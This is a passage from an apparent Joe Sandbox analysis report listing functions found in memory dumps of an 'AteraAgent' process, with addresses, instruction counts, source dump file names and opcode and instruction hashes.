                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a68ec17a9552c85278cf4505bcb53708e03612c7b0eb95811b478f7e55c7aafa
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fae3a2b647f7fa79dcd59f747d4ff463654e023ed8834800bd0983a8733037b3
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10411961B0E7CA4FE759DBA898716E47BA0EF96350F0902F6D098CF1D7DD1438068751
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B635140 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 422a4ec2e75e2b07c51784a849b608c52478a453960430ffa1735000f713f6b7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a923148a8c4c2e121063456729b405740927d82996e1e2a55188a2a0f293ad7c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 422a4ec2e75e2b07c51784a849b608c52478a453960430ffa1735000f713f6b7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3241A03071DE898FEBA9EB2CC0A0E7177E1EF59304B1545B9D09ACB2A6CD24F945C750
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6238E1 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 44345d7f6df6a6832dfbfd0f35bd6bd8dc08aa291f95e7e6aa371eac63542faf
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: dbfcc17a7a1616d19093060e50ed2bba6b897e4e39f2a9fcc665c145fa8ac3bf
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44345d7f6df6a6832dfbfd0f35bd6bd8dc08aa291f95e7e6aa371eac63542faf
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0541A470E0DA8D8FEB51DFA8C451AE9BFF0EF5A310F0401A6D058DB2A6CB34A981C750
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83552F Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 480fcd713305aad93e3e74e90a0469cae50a7dcfc7e15ff370e8b796dd4fc3c3
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 11388208789f67720b961328d446958bb7a76d02a0b01f5d8900bc15b396eff3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 480fcd713305aad93e3e74e90a0469cae50a7dcfc7e15ff370e8b796dd4fc3c3
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64411662F2AE0F0BEB78979C90A55F963C2FFAC35070501B9D41EC73A6ED24F9424680
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B630220 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4ed5d2fc93de01b85476645a47b9f3b2122d3b6b94e5db30a12f778aef495139
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9dff2a5761b2fb010e58bdd5ecb68dea081dc2c2db1dccebff5053799b41420c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ed5d2fc93de01b85476645a47b9f3b2122d3b6b94e5db30a12f778aef495139
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA418130B19A0E4FDBA8DF5884656BA37E1FFA8340F11017AE41ED7295CE34F9068780
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6270F0 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 42cf075b86c49a9b83dc4e305dc1a0d5f5f3655761338467f9444dddada2ba72
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0c293b010cb96a59be1f9dd5cbed22cba0f4466cab9d4ae531c1bcf8001efb84
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42cf075b86c49a9b83dc4e305dc1a0d5f5f3655761338467f9444dddada2ba72
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1331E531B1DA0D4FE768DB5C986A57977E1EF9D351B0501BEE08DCB2A6DE20BC0286C1
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B634BF0 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 03adddec59e5067ac432f0d4a553643b1233fbd4732f53f0b405984adb7156d1
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 12bda7bcd5086ea2ee5f77b12e17f59251e1f0565e9451e4cd84119f5c8ea767
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03adddec59e5067ac432f0d4a553643b1233fbd4732f53f0b405984adb7156d1
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E741C822B1AD4D4FEBB9D76C846567977D1EF98240B0900BED09ECB2E6DE14BD468340
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B837939 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7a45d4ce7775fa3da5da18410cdc70cc1ce265635f46e3041b66c8d41e105d60
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3ed45427e133a35cebaeb619d0e399cd5faf0cfb38316bbc1d46bc456a814c16
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a45d4ce7775fa3da5da18410cdc70cc1ce265635f46e3041b66c8d41e105d60
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5241083460EA8E8FDB56DF68C4A0A717BE1FF4A304B0905F9C04DCB2A7DA29E945C750
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B635138 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cdf4930870be910a4b0f3800ee3dd41d91bd9ae02d61eaba269d59213f3b0a02
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: df8c867973c62146ca152a1c18570c317153e8e3cc00c5b048ee45000816f3ef
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdf4930870be910a4b0f3800ee3dd41d91bd9ae02d61eaba269d59213f3b0a02
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5341913071DF898FDBA9EB2CC0A0E7177E1FF99304B1945A9D09ACB2A6C924F945C750
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B627140 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7666c64193f2a2ac682178c433cbb26f914cd8e1aacb3475f9c40b80a726362c
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 642624754d801732e1fd540607176cecab135961e3e5b5b2df928b61e59e8202
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7666c64193f2a2ac682178c433cbb26f914cd8e1aacb3475f9c40b80a726362c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C231D672B19D1C4FDBA4EB5C94A97A933E1FB98750F050176E41DDB2A5DE24BC024380
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83CF15 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 31a87e949898d4eed4068699286b74588b908703640575269712810763e19b28
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3f2f5198c71cf5300da6975bd0eaf14471873f4919210a74f81c95ca6058e28a
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31a87e949898d4eed4068699286b74588b908703640575269712810763e19b28
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B31F430B0EB5C4FD764AB5C986577A7BD1EF89710F0502AFE449C73A2CA25AD4187C2
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63A245 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 06f39769c4d5b8166ac68d6bc38f93979f2333b95f0dcb9949f402605f18af97
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: fe8c606fea0cc20941659af5f3d35569637616ebd1d6914c2b75a2b8df3a2490
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06f39769c4d5b8166ac68d6bc38f93979f2333b95f0dcb9949f402605f18af97
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2831093170EA8D4FE778965D98A567937D0EF96320F0A017AE49DCB1B2DD26FC029341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63EB01 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7477e8c5b8aed6c459e6c341ac3f2886078bf254c9151a33d71cd8978d6ee598
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2ef85d17efc45602ee45c8ecb38fcada2ec8ec754cfc344e8f554d47a049ce80
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7477e8c5b8aed6c459e6c341ac3f2886078bf254c9151a33d71cd8978d6ee598
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E631E83170DE8D4FC75AD7388060AE177E1FF96200B0941AAD49ECB2A6DE25F946C750
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B645B50 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 17bb9219f37292db081f0256af8456d6152dc201e0f761bc1fcd4c847ad3ac7f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3f459635249e5d0ce89d632b1c01f0144a9f9adf8985f553d8c2fb26ba49ba24
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17bb9219f37292db081f0256af8456d6152dc201e0f761bc1fcd4c847ad3ac7f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C41D421A1EB890FD766977848796657BF2EF42200B0A40FBD099CF1E7DE187D0AC751
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B630258 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 62bee299b327b851c2c0aa15109ad56e49e72abb949451766bcba8699f974616
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: cb4446ae6ef610a07539961760da97560bbd58620298c9c5c60c71114f4ff6c9
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62bee299b327b851c2c0aa15109ad56e49e72abb949451766bcba8699f974616
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51312831B1DA494FF7A0C5589494A76B7D2EFA8324F09067EE45CC72B1DA15FA80C386
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83ECB2 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 12369fb2cb73f5172de62e956a8f35f1243e1fc73aac795702e0c8ce93c80ca4
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6da18af7aa9e6221e9c552489085a5b48ebd4035a9f5bc15ffa22305a00112a1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12369fb2cb73f5172de62e956a8f35f1243e1fc73aac795702e0c8ce93c80ca4
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6731B531718E494FDBA4E76CD4A4FBAB3D1EF98300F0545BAD05EC72A6CE24B9468741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6360D1 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 24a529f25e808c7a86d66ea472f904165aea4caeb78efb9c2535d22fd0e2c91a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7be01eab123e7fee588575dcb361831f6f032c446695d68d4286a7429186681c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24a529f25e808c7a86d66ea472f904165aea4caeb78efb9c2535d22fd0e2c91a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F21D522B0FE4E0FEBE9856D6CB95653AC2EFA530071A00BAD458CB2B7DD11ED058341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63F151 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ac8a5dde4f2245e398b25a12e877cf773254258b08b061452bbfc3623cd8f69e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: dab2fdd4e86986ffa3e589191cc45925ac933e5f50f91e95a70ae17e4b79f060
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac8a5dde4f2245e398b25a12e877cf773254258b08b061452bbfc3623cd8f69e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1212632B0E9490FEB68A76CBC661B577C0EB99325B0501BBE84DCB2E6DC166C464381
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6398C8 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ffde2b9b324898bb4b6bef430db929864bc3e485a1988a8e0a6104b1dcb4adcc
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f51a592898d9e0de08db66f85f50721d10af2d577f8ca935e2847125a949e76b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffde2b9b324898bb4b6bef430db929864bc3e485a1988a8e0a6104b1dcb4adcc
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE317A2250E7C64FD7578B6888656907FF0AF4722471E05EBC489CF0F7E6689C4ACB52
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B644340 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a8e1fcf7bc2fcaabd5feb2734d4e6dbf8ab373e8de1ce8781354b0c962bc058e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 09c1e5e936513e45f327a0173e82ec50e0b357709b8f6b0533979e22e0ea5963
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8e1fcf7bc2fcaabd5feb2734d4e6dbf8ab373e8de1ce8781354b0c962bc058e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97312432B19E4A4FD769D668C466BA577D2EF54300F05447CD0AECB2A6EE29B8818380
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6281AE Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f216979827198aca9e8d7f044806d858af7306157faff7da44ef15f6bbf21cdb
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6d5d3993cf767fbb635b97bb6c3dca067f31a96584c13bc47fe45aaab49d4acd
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f216979827198aca9e8d7f044806d858af7306157faff7da44ef15f6bbf21cdb
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32411A70E0965E8FDB58DBA8C8657B8BBB1EF55301F5400AAD04DE72D6CA342984CB11
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62E928 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
